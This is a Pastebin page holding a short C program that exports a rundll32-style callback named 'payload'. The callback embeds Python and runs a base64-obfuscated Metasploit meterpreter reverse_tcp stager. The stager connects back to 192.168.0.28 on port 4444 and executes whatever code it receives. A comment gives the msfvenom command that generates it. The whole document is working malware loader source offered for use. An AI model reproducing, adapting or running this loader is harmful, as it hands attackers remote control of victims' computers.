Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include<stdio.h>
- #include<Windows.h>
- #include<Python.h>
- void CALLBACK payload(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
- {
- Py_Initialize();
- PyRun_SimpleString("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yOCcsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))"); /* write here your python meterpreter payload : msfvenom --payload=python/meterpreter/reverse_tcp LHOST=192.168.0.28 LPORT=4444 */
- Py_Finalize();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement